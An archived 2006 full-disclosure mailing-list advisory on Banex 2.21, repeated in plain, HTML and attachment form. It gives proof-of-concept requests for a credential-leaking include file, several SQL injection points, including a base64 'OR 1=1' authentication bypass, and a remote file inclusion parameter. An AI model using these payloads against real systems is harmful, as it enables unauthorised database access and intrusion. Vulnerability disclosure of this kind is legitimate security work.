'[Full-disclosure] Banex Multiple Vulnerabilities'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Banex Multiple Vulnerabilities
From:       SirDarckCat <sirdarckcat () gmail ! com>
Date:       2006-07-30 4:42:36
Message-ID: 8ba534860607292142v59450c31l430d65424ca3967b () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Discovered by Sirdarckcat from elhacker.net

Banex 2.21
http://sourceforge.net/projects/banex
==============================================

Banex is a simple script for sharing Banners
through multiple webs.

Anyway it has multiple vulnerabilities.

==============================================
1.- Sensitive Information Disclosure

PoC:
http://www.server.com/inc/lib.inc

No protection, and contains the DB name password and user.

==============================================

2.- SQL injection


PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

==============================================

3.- SQL injection

PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/
                
*

==============================================

4.- SQL injection **** AUN CON MAGIC ON ****

PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=


Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

==============================================

5.- Remote File Inclusion:

PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?


==============================================

Att.
Sirdarckcat
elhacker.net


-- 
Att.
SirDarckCat@GMail.com

http://www.google.com/search?q=sirdarckcat


[Attachment #5 (text/html)]

<p>Discovered by Sirdarckcat from <a href="http://elhacker.net">elhacker.net</a></p>
<p>Banex 2.21<br><a href="http://sourceforge.net/projects/banex">http://sourceforge.net/projects/banex</a><br>==============================================</p>
 <p>Banex is a simple script for sharing Banners<br>through multiple webs.</p>
<p>Anyway it has multiple vulnerabilities.</p>
<p>==============================================<br>1.- Sensitive Information Disclosure</p>
<p>PoC:<br><a href="http://www.server.com/inc/lib.inc">http://www.server.com/inc/lib.inc</a></p>
 <p>No protection, and contains the DB name password and user.</p>
<p>==============================================</p>
<p>2.- SQL injection</p>
<p><br>PoC:</p>
<p>GET /admin.php HTTP/1.1<br>Host: <a \
href="http://www.server.com/">www.server.com</a><br>Authentication: Basic: \
YWRtaW4nIE9SIDE9MS8qOnA=</p> <p>==============================================</p>
<p>3.- SQL injection</p>
<p>PoC:<br><a href="http://www.server.com/signup.php?signup=1&amp;user_pw=2&amp;passwordconfirm= \
2&amp;user_name=3&amp;name=3&amp;email=3&amp;site_url=3&amp;site_name='[SQL]/">http://www.server \
.com/signup.php?signup=1&amp;user_pw=2&amp;passwordconfirm=2&amp;user_name=3&amp;name=3&amp;email=3&amp;site_url=3&amp;site_name='[SQL]/
 </a>*</p>
<p>==============================================</p>
<p>4.- SQL injection **** AUN CON MAGIC ON ****</p>
<p>PoC:<br>GET /admin.php?activatebanner&amp;id=-1%20[SQLi] HTTP/1.1<br>Host: <a \
href="http://www.server.com/">www.server.com</a><br>Authentication: Basic: \
YWRtaW4nIE9SIDE9MS8qOnA=</p> <p><br>Same bug in context \
SELECT:<br>/admin.php?activateuser&amp;id='+[SQL]<br>/admin.php?deleteunuser&amp;id='+[SQL]<br>/ \
admin.php?deleteuserbanner&amp;deleteuserbanner='+[SQL]<br>/admin.php?deleteuserbanner&amp;deleteuserbanner='+[SQL]
 <br>/admin.php?viewmem&amp;viewmem='+[SQL]<br>/admin.php?viewmemunb&amp;viewmemunb='+[SQL]<br>/admin.php?viewunmem&amp;viewunmem='+[SQL]</p>
 <p>Same bug, in context \
DELETE:<br>/admin.php?deletebanner&amp;id=-1+[SQL]<br>/admin.php?activateuser&amp;deleteuser='+[SQL]<br>/admin.php?deleteuserbanner&amp;deleteuserbanner='+[SQL]</p>
 <p>==============================================</p>
<p>5.- Remote File Inclusion:</p>
<p>PoC:<br><a href="http://www.server.com/members.php?cfg_root=http://www.google.com/">http://www.server.com/members.php?cfg_root=http://www.google.com/</a>?</p>
 <p><br>==============================================</p>
<p>Att.<br>Sirdarckcat<br><a href="http://elhacker.net">elhacker.net</a></p><br \
clear="all"><br>-- <br>Att.<br><a \
href="mailto:SirDarckCat@GMail.com">SirDarckCat@GMail.com</a><br><br><a \
href="http://www.google.com/search?q=sirdarckcat"> \
http://www.google.com/search?q=sirdarckcat</a> 


["banex.txt" (text/plain)]

Discovered by Sirdarckcat from elhacker.net

Banex 2.21
http://sourceforge.net/projects/banex
==============================================

Banex is a simple script for sharing Banners
through multiple webs.

Anyway it has multiple vulnerabilities.

==============================================
1.- Sensitive Information Disclosure

PoC:
http://www.server.com/inc/lib.inc

No protection, and contains the DB name password and user.

==============================================

2.- SQL injection


PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

==============================================

3.- SQL injection

PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*


==============================================

4.- SQL injection **** AUN CON MAGIC ON ****

PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=


Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

==============================================

5.- Remote File Inclusion:

PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?


==============================================

Att.
Sirdarckcat
elhacker.net



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic